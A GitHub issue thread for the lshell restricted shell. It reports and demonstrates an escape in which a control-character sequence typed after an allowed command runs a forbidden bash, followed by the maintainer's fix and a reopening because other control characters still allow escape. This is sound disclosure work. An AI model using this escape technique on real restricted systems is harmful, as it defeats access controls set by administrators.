Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SECURITY ISSUE: Escape possible using special keys #149

Closed
Snawoot opened this issue Aug 17, 2016 · 4 comments

Comments

Projects
None yet
2 participants
@Snawoot
Copy link

commented Aug 17, 2016

Just type <CTRL+V><CTRL+J> after any allowed command and then type desired restricted command:

vladislav@dt1:~$ getent passwd testuser
testuser:x:1001:1002:,,,:/home/testuser:/usr/bin/lshell
vladislav@dt1:~$ su - testuser
Password: 
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echo<CTRL+V><CTRL+J>
bash

testuser@dt1:~$ which bash
/bin/bash

@Snawoot Snawoot changed the title SECURITY ISSUE: Escape possible by using special keys SECURITY ISSUE: Escape possible using special keys Aug 18, 2016

@ghantoos

This comment has been minimized.

Copy link
Owner

commented Aug 21, 2016

Hi @Snawoot!

Thanks for reporting these major security issues. I am unfortunately away from my PC until tomorrow night. I'll do my best to work on this asap.

I also saw your Debian bug reports, as I am the Debian maintainer for lshell.

Cheers!

@ghantoos ghantoos added the security label Aug 22, 2016

@ghantoos ghantoos closed this in e72dfcd Aug 22, 2016

@ghantoos

This comment has been minimized.

Copy link
Owner

commented Aug 22, 2016

@Snawoot can you confirm that this fixes the issue you reported? Thanks! :)

@Snawoot

This comment has been minimized.

Copy link
Author

commented Aug 22, 2016

@ghantoos Fix confirmed, thank you!

ghantoos pushed a commit that referenced this issue Aug 25, 2016

Ignace Mouzannar
[security] parse quoted strings for possible commands (Closes #148, C…
…loses #147, Closes #149)

Both issues #148 and #147 use the same vulnerability in the parser,
that ignored the quoted strings. Parsing only the rest of the line
for security issues. This is a major security bug.

This commits also corrects a previous ommited correction regarding the
control charaters, that permitted to escape from lshell.

Thank you Proskurin Kirill (@Oloremo) and Vladislav Yarmak (@Snawoot)
for reporting this!!
@ghantoos

This comment has been minimized.

Copy link
Owner

commented Aug 25, 2016

Reopening as issue is still there, using other control characters. See #148.

@ghantoos ghantoos reopened this Aug 25, 2016

ghantoos added a commit that referenced this issue Aug 25, 2016

[security] parse quoted strings for possible commands #147, #148, #149
Closes #148, Closes #147, Closes #149)

Both issues #148 and #147 use the same vulnerability in the parser,
that ignored the quoted strings. Parsing only the rest of the line
for security issues. This is a major security bug.

This commits also corrects a previous ommited correction regarding the
control charaters, that permitted to escape from lshell.

Thank you Proskurin Kirill (@Oloremo) and Vladislav Yarmak (@Snawoot)
for reporting this!!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.